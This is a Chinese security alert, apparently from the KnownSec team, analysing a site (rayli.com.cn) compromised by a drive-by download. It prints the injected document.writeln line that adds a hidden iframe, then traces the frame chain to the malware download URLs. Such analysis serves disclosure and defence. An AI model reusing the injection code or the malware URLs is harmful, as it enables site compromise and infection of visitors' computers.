用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://www.rayli.com.cn/comjs/2008newabout.js
网页被嵌入恶意链接代码:
document.writeln(”<iframe src=http:\/\/q.fgjg1.cn\/hjll\/25.htm width=100 height=0><\/Iframe>”);
挂马分析:
[wide]http://www.rayli.com.cn/
[script]http://www.rayli.com.cn/comjs/2008newabout.js
[frame]http://q.fgjg1.cn/hjll/25.htm
[frame]http://z.kghh1.cn/d2/fxx.htm
[frame]http://z.kghh1.cn/d2/all.htm
[frame]http://z.kghh1.cn/d2/1.htm
[exe]http://w.qqnetcn.cn/d2.exe
[frame]http://z.kghh1.cn/d2/0.htm
[exe]http://w.qqnetcn.cn/dd.exe
[frame]http://z.kghh1.cn/d2/newlz.htm
[exe]http://w.qqnetcn.cn/d2.exe
[frame]http://z.kghh1.cn/d2/s.htm
[exe]http://w.qqnetcn.cn/d2.exe
[frame]http://z.kghh1.cn/d2/office.htm
[exe]http://w.qqnetcn.cn/d2.exe
[frame]http://z.kghh1.cn/d2/bf.htm
[exe]http://w.qqnetcn.cn/d2.exe
[frame]http://z.kghh1.cn/d2/cx.htm
[exe?]http://w.qqnetcn.cn/d2.exe
[frame]http://z.kghh1.cn/d2/uu.htm
[exe?]http://w.muu998.com/uusee.cab
[frame]http://z.kghh1.cn/d2/2.htm
[exe]http://w.qqnetcn.cn/d2.exe
[frame]http://z.kghh1.cn/d2/3.htm
[exe]http://w.qqnetcn.cn/d2.exe
[frame]http://z.kghh1.cn/d2/4.htm
[exe]http://w.qqnetcn.cn/d2.exe
[frame]http://z.kghh1.cn/d2/5.htm
[exe]http://w.qqnetcn.cn/d2.exe
[frame]http://z.kghh1.cn/d2/b.htm
[cab]http://w.qqnetcn.cn/baidu.cab
[frame]http://z.kghh1.cn/d2/b.htm
[cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
[script]http://js.tongji.cn.yahoo.com/929405/ystat.js
最终下载病毒文件:
http://w.qqnetcn.cn/dd.exe
http://w.qqnetcn.cn/d2.exe
http://w.qqnetcn.cn/baidu.cab
http://w.muu998.com/uusee.cab
通过执行以上病毒文件,来达到完全控制访问者的系统。
知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。